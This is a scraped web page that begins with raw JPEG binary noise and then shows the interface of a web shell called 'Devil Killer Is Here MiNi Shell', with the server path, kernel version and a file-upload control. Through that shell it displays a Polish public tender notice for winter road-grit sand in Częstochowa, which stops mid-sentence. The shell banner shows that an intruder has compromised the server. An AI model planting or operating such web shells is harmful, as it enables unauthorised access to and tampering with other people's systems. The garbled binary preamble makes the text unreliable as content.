JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20210928/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20210928/0019493901-N-2021.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Dostawa piasku do zwalczania śliskości na drogach powiatowych i wojewódzkich dla potrzeb Powiatowego Zarządu Dróg w Częstochowie w sezonie zimowym 2021/2022. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Powiatowy Zarząd Dróg w Częstochowie</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 151406009</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Jana III Sobieskiego 9</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Częstochowa</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">42-217</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">śląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL224 - Częstochowski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">343229222</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">343785468</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">pzd@czestochowa.powiat.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">http://www.pzdczestochowa.4bip.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Dostawa piasku do zwalczania śliskości na drogach powiatowych i wojewódzkich dla potrzeb Powiatowego Zarządu Dróg w Częstochowie w sezonie zimowym 2021/2022. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-9ec067a5-204e-11ec-b885-f28f91688073</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00194939</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-09-28</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00002665/04/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.3 Dostawa piasku do zwalczania śliskości na drogach powiatowych i wojewódzkich dla potrzeb Powiatowego Zarządu Dróg w Częstochowie w sezonie zimowym 2021/2022.</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://pzd-czestochowa.logintrade.net/rejestracja/ustawowe.html <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://pzdczestochowa.logintrade.net/</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów elektronicznych,<br/>elektronicznych kopii dokumentów i oświadczeń oraz informacji przekazywanych przy ich użyciu<br/>opisane zostały w Regulaminie korzystania z elektronicznej platformy usług Zamawiającego pod<br/>adresem:https://pzd-czestochowa.logintrade.net/rejestracja/instrukcje.html</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Zamawiający wymaga złożenia oferty w postaci katalogu elektronicznego</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Działając zgodnie z art. 13 ust. 1 i ust. 2 ogólnego<br/>Rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie<br/>ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego<br/>przepływu takich danych oraz uchylenia dyrektywy 95/46/WE – dalej w skrócie zwane RODO,<br/>informujemy, iż:1. Administratorem Państwa danych osobowych jest Powiatowy Zarząd Dróg w<br/>Częstochowie z siedzibą przy ul. Jana III Sobieskiego 9, tel. 34/3229222, fax. 34/37854682. Kontakt z<br/>inspektorem ochrony danych jest możliwy pod adresem: ido@czestochowa.powiat.pl 3. Państwa dane osobowe przetwarzane będą na podstawie:- art. 6 ust. 1 lit. b RODO - przetwarzanie jest niezbędne do<br/>zawarcia i realizacji umowy, - art. 6. ust. 1 lit. c RODO - przetwarzanie jest niezbędne do wypełnienia<br/>obowiązku prawnego ciążącego na administratorze, - art. 6 ust. 1 lit. e RODO - przetwarzanie jest<br/>niezbędne do wykonania zadania realizowanego w interesie publicznym.4. Państwa dane osobowe<br/>będą wykorzystywane w celu udzielenia zamówienia publicznego na podstawie przepisów Prawa<br/>zamówień publicznych (Ustawa z dnia 11 września 2019r. Prawo zamówień publicznych z póżn.<br/>zmianami) dalej „ustawa Pzp” oraz po udzieleniu zamówienia, w celu realizacji umowy.5. Odbiorcami<br/>Państwa danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja<br/>postępowania w oparciu o art. 18 ustawy Pzp (Dz. U. z 2019 r. poz. 2019 z późniejszymi zmianami) . 6.<br/>Państwa dane osobowe będą przetwarzane przez okres niezbędny do realizacji celu przetwarzania w<br/>zakresie udzielenia zamówienia publicznego na podstawie ustawy Pzp oraz realizacji umowy do<br/>momentu wygaśnięcia obowiązków przetwarzania danych wynikających z przepisów prawa. Następnie<br/>dane osobowe zostaną zarchiwizowane zgodnie z obowiązującymi przepisami prawa. W przypadku<br/>unieważnienia postępowania o udzielenia zamówienia publicznego Państwa dane będą przetwarzane<br/>do momentu wygaśnięcia obowiązków ich przetwarzania wynikających z przepisów prawa, w tym<br/>przepisów dotyczących archiwizacji.7. Obowiązek podania przez Państwa danych osobowych<br/>bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym w przepisach ustawy<br/>Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje<br/>niepodania określonych danych wynikają z ustawy Pzp.8. Posiadają Państwa następujące prawa:− na<br/>podstawie art. 15 RODO prawo dostępu do danych osobowych;− na podstawie art. 16 RODO prawo<br/>do sprostowania *;− na podstawie art. 18 RODO prawo żądania od Administratora Danych Osobowych<br/>ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18<br/>ust. 2 RODO **; 9. W przypadku uznania, iż przetwarzanie danych osobowych Administratora narusza<br/>przepisy RODO, przysługuje Państwu prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych<br/>Osobowych (ul. Stawki 2, Warszawa 00 -193).10. Nie przysługuje Państwu:− w związku z art. 17 ust. 3<br/>lit. b, d lub e RODO prawo do usunięcia danych osobowych;− prawo do przenoszenia danych<br/>osobowych, o którym mowa w art. 20 RODO;− na podstawie art. 21 RODO prawo sprzeciwu, wobec<br/>przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Państwa danych osobowych<br/>jest art. 6 ust. 1 lit. c RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">PZD.3450.18.2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">3</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> ZADANIE NR 1<br/>Dostawa (zakup i transport) piasku do zwalczania śliskości na drogach powiatowych i<br/>wojewódzkich na plac Obwodu Drogowego nr 1 w Rudnikach w ilości około 5.000 Mg w sezonie<br/>zimowym 2021/2022.<br/>Szczegółowy zakres przedmiotu zamówienia zawiera załącznik nr 1 do SWZ (SST piasek).<br/>Dostarczony przedmiot zamówienia musi być wysokiej jakości oraz spełniać wymogi zawarte w<br/>SWZ.<br/>Każda partia piasku musi posiadać stosowne normy, atesty i aprobaty. Wykonawca dostarcza<br/>przedmiot zamówienia na plac Obwodu Drogowego Nr 1 w Rudnikach na ulicę Dworcową 26 w<br/>Rudnikach.<br/>Przedmiot zamówienia należy wykonać zgodnie z obowiązującymi w tym zakresie przepisami.<br/>Piasek powinien posiadać następujący skład:<br/>- zawartość ziaren mniejszych niż 0,063 mm, nie więcej niż 5%,<br/>- uziarnienie do 2 mm, nadziarna nie więcej niż 15% ( nie dopuszcza się w nadziarnie ziaren<br/>większych od 4mm),<br/>- nie może być zanieczyszczony związkami organicznymi jak. np. trawa, szczątki korzeni,<br/>konarów itp. – barwa żółta,<br/>- nie może zawierać żadnych zanieczyszczeń gliniastych lub ilastych,<br/>- wskaźnik piaskowy ma być większy niż 65%.<br/>- wilgotność piasku do 5%<br/>Pozostałe wymagania dla piasku zawarte są w PN-EN 13043:2004<br/>W przypadku zmiany obowiązujących norm jakościowych w trakcie trwania umowy, Wykonawca<br/>będzie zobowiązany dostosować jakość dostarczanego przedmiotu zamówienia do nowych<br/>norm.<br/>Zamawiający dopuszcza ujęcie w ofercie, a następnie zastosowanie materiałów równoważnych<br/>o parametrach technicznych nie gorszych niż określono w dokumentacji. Wykonawca, który<br/>powołuje się na rozwiązania równoważne opisywanym przez Zamawiającego, jest obowiązany<br/>wykazać, ze oferowane przez niego dostawy spełniają wymagania określone przez<br/>Zamawiającego.<br/>Do wzajemnego współdziałania przy realizacji niniejszej umowy, ze strony Zamawiającego,<br/>wyznacza się:<br/>Na Obwodzie Drogowym Nr 1 w Rudnikach – Kierownika Obwodu Drogowego Pana Zbigniewa<br/>LEWACKIEGO, tel. +48/696-429-870, (34) 327-95-90.<br/>Zgodnie z art. 101 ust. 4 ustawy Pzp w sytuacji, gdyby w dokumentacji przetargowej lub SST, a<br/>więc w dokumentach opisującym przedmiot zamówienia, zawarto odniesienie do norm, ocen<br/>technicznych, aprobat, specyfikacji technicznych i systemów referencji technicznych, o których<br/>mowa w art. 101 ust. 1 pkt 2 i ust. 3 Pzp a takim odniesieniom nie towarzyszyło wyrażenie „lub<br/>równoważne”, to Zamawiający dopuszcza rozwiązania równoważne opisywanym w każdej takiej<br/>normie, europejskiej ocenie technicznej, aprobacie, specyfikacji technicznej, systemowi<br/>referencji technicznych. W związku z powyższym należy przyjąć, że każdej: normie, europejskiej<br/>ocenie technicznej, aprobacie, specyfikacji technicznej, systemowi referencji technicznych<br/>występujących w opisie przedmiotu zamówienia towarzyszą wyrazy „lub równoważne". Zgodnie<br/>z art. 101 ust. 5 Pzp wykonawca, który powołuje się na rozwiązania równoważne opisywanym w<br/>tych dokumentach, jest obowiązany udowodnić, poprzez dołączenie do oferty stosownych<br/>przedmiotowych środków dowodowych, o których mowa w art. 104–107 Pzp, że proponowane<br/>rozwiązania w równoważnym stopniu spełniają wymagania określone w opisie przedmiotu<br/>zamówienia. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">14211000-3 - Piasek</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">8 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Opis kryteriów oceny ofert wraz z podaniem wag tych kryteriów, i<br/>sposobu oceny ofert.<br/>1) kryterium oceny ofert jest:<br/>- cena ryczałtowa brutto – 90 %,<br/>- terminy dostaw partii piasku w ilości do 400 Mg waga 5 %<br/>- terminy dostaw partii piasku w ilości powyżej 400 Mg waga 5 %<br/>2) sposób oceny<br/>a) Wzór do obliczenia punktowego w kryterium CENA<br/>Cena = Cena najniższa oferowana (brutto)/ Cena badanej oferty (brutto) x 100 punktów x 90%<br/>b) Zasady obliczenia punktowego w kryterium Terminy dostaw partii piasku w ilości do 400Mg (podany<br/>w liczbie dni roboczych (tj. od poniedziałku do piątku, z wyjątkiem świąt od godziny 7:00-15:00) od<br/>wysłania powiadomienia, minimalna liczba dni 1, maksymalna liczba dni 3).<br/>Wykonawcy, którzy określą w formularzu ofertowym (zał. 3 do SWZ):<br/>􀀀 od 1 do 2 dni roboczych od wysłania powiadomienia otrzymają 5,0 % - 5,0 pkt<br/>􀀀 do 3 dni roboczych od wysłania powiadomienia otrzymają 2,5 % - 2,5 pkt<br/>c) Zasady obliczenia punktowego w kryterium Terminy dostaw partii piasku w ilości powyżej 400 Mg<br/>(podany w liczbie dni roboczych (tj. od poniedziałku do piątku, z wyjątkiem świąt od godziny 7:00-<br/>15:00) od wysłania powiadomienia, minimalna liczba dni 1, maksymalna liczba dni 5).<br/>Wykonawcy, którzy określą w formularzu ofertowym (zał. 3 do SWZ):<br/>􀀀 od 1 do 4 dni roboczych od wysłania powiadomienia otrzymają 5,0 % - 5,0 pkt,<br/>􀀀 do 5 dni roboczych od wysłania powiadomienia otrzymają 2,5 % - 2,5 pkt.<br/>UWAGA: W przypadku, jeżeli wykonawca nie poda w Formularzu OFERTA długości terminu dostaw<br/>piasku, zamawiający uzna, że wykonawca oferuje termin przekraczający wymagany w powyższych<br/>zapisach i nie przyzna punktów za to kryterium oceny ofert.<br/>„Wymagania jakościowe odnoszące się do co najmniej głównych elementów składających się na<br/>przedmiot zamówienia, o których mowa w art. 246 ust. 2 Pzp z 11.09.2019 r: zostały określone w opisie<br/>przedmiotu zamówienia, czyli w dokumentacji (Warunki techniczne, wytyczne ZDW Katowice<br/>specyfikacje cenowe - kosztorys ofertowy). Dokumenty te wskazują parametry wszystkich materiałów i<br/>urządzeń, które będą musiały być użyte do realizacji przedmiotu zamówienia jak również zasady<br/>wiedzy technicznej wymagane do wykonania zadania. Uwzględnią także wszystkie elementy, które<br/>mają wpływ na koszty związane z eksploatacją oraz utylizacją przedmiotu zamówienia. Dokumenty<br/>opisujące przedmiot zamówienia są tak precyzyjne, że bez względu na fakt, kto będzie wykonawcą<br/>przedmiotu zamówienia jedyną różnicą będą zaoferowane ceny (tzn. przedmiot zamówienia jest<br/>zestandaryzowany - identyczny, niezależnie od tego, który z wykonawców go wykona). W związku z<br/>powyższym Zamawiający jest upoważniony do zastosowania ceny, jako jedynego kryterium wyboru<br/>oferty najkorzystniejszej lub ceny, jako jednego z kryteriów wyboru oferty o znaczeniu ponad 60%.”</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">90,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">terminy dostaw partii piasku w ilości do 400 Mg</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">5,00</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">terminy dostaw partii piasku w ilości powyżej 400 Mg</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">5,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> ZADANIE NR 2<br/>Dostawa (zakup i transport) piasku do zwalczania śliskości na drogach powiatowych i<br/>wojewódzkich w ilości łącznej około 5.000 Mg, na plac Obwodu Drogowego Nr 2 w Koniecpolu w<br/>sezonie zimowym 2021/2022.Szczegółowy zakres przedmiotu zamówienia zawiera załącznik nr<br/>1 do SWZ (SST piasek).<br/>Dostarczony przedmiot zamówienia musi być wysokiej jakości oraz spełniać wymogi zawarte w<br/>SWZ.<br/>Każda partia piasku musi posiadać stosowne normy, atesty i aprobaty. Wykonawca dostarcza<br/>przedmiot zamówienia na plac Obwodu Drogowego Nr 2 w Koniecpolu na ul. Słowackiego 84 .<br/>Przedmiot zamówienia należy wykonać zgodnie z obowiązującymi w tym zakresie przepisami.<br/>Piasek powinien posiadać następujący skład:<br/>- zawartość ziaren mniejszych niż 0,063 mm, nie więcej niż 5%,<br/>- uziarnienie do 2 mm, nadziarna nie więcej niż 15% ( nie dopuszcza się w nadziarnie ziaren<br/>większych od 4mm),<br/>- nie może być zanieczyszczony związkami organicznymi jak. np. trawa, szczątki korzeni,<br/>konarów itp. – barwa żółta,<br/>- nie może zawierać żadnych zanieczyszczeń gliniastych lub ilastych,<br/>- wskaźnik piaskowy ma być większy niż 65%.<br/>- wilgotność piasku do 5%<br/>Pozostałe wymagania dla piasku zawarte są w PN-EN 13043:2004<br/>W przypadku zmiany obowiązujących norm jakościowych w trakcie trwania umowy, Wykonawca<br/>będzie zobowiązany dostosować jakość dostarczanego przedmiotu zamówienia do nowych<br/>norm.<br/>Zamawiający dopuszcza ujęcie w ofercie, a następnie zastosowanie materiałów równoważnych<br/>o parametrach technicznych nie gorszych niż określono w dokumentacji. Wykonawca, który<br/>powołuje się na rozwiązania równoważne opisywanym przez Zamawiającego, jest obowiązany<br/>wykazać, ze oferowane przez niego dostawy spełniają wymagania określone przez<br/>Zamawiającego.<br/>Do wzajemnego współdziałania przy realizacji niniejszej umowy, ze strony Zamawiającego,<br/>wyznacza się:<br/>Na Obwodzie Drogowym Nr 2 w Koniecpolu – Kierownika Obwodu Drogowego Pana Tadeusza<br/>CIASTKO, tel. +48/696-429-871, (34) 355-16-14.<br/>Zgodnie z art. 101 ust. 4 ustawy Pzp w sytuacji, gdyby w dokumentacji przetargowej lub SST, a<br/>więc w dokumentach opisującym przedmiot zamówienia, zawarto odniesienie do norm, ocen<br/>technicznych, aprobat, specyfikacji technicznych i systemów referencji technicznych, o których<br/>mowa w art. 101 ust. 1 pkt 2 i ust. 3 Pzp a takim odniesieniom nie towarzyszyło wyrażenie „lub równoważne”, to Zamawiający dopuszcza rozwiązania równoważne opisywanym w każdej takiej<br/>normie, europejskiej ocenie technicznej, aprobacie, specyfikacji technicznej, systemowi<br/>referencji technicznych. W związku z powyższym należy przyjąć, że każdej: normie, europejskiej<br/>ocenie technicznej, aprobacie, specyfikacji technicznej, systemowi referencji technicznych<br/>występujących w opisie przedmiotu zamówienia towarzyszą wyrazy „lub równoważne". Zgodnie<br/>z art. 101 ust. 5 Pzp wykonawca, który powołuje się na rozwiązania równoważne opisywanym w<br/>tych dokumentach, jest obowiązany udowodnić, poprzez dołączenie do oferty stosownych<br/>przedmiotowych środków dowodowych, o których mowa w art. 104–107 Pzp, że proponowane<br/>rozwiązania w równoważnym stopniu spełniają wymagania określone w opisie przedmiotu<br/>zamówienia. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">14211000-3 - Piasek</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">8 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Opis kryteriów oceny ofert wraz z podaniem wag tych kryteriów, i<br/>sposobu oceny ofert.<br/>1) kryterium oceny ofert jest:<br/>- cena ryczałtowa brutto – 90 %,<br/>- terminy dostaw partii piasku w ilości do 400 Mg waga 5 %<br/>- terminy dostaw partii piasku w ilości powyżej 400 Mg waga 5 %<br/>2) sposób oceny<br/>a) Wzór do obliczenia punktowego w kryterium CENA<br/>Cena = Cena najniższa oferowana (brutto)/ Cena badanej oferty (brutto) x 100 punktów x 90%<br/>b) Zasady obliczenia punktowego w kryterium Terminy dostaw partii piasku w ilości do 400Mg (podany<br/>w liczbie dni roboczych (tj. od poniedziałku do piątku, z wyjątkiem świąt od 